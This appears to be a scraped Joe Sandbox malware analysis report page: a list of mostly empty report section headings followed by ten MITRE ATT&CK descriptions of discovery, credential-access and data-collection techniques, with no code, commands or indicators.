Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre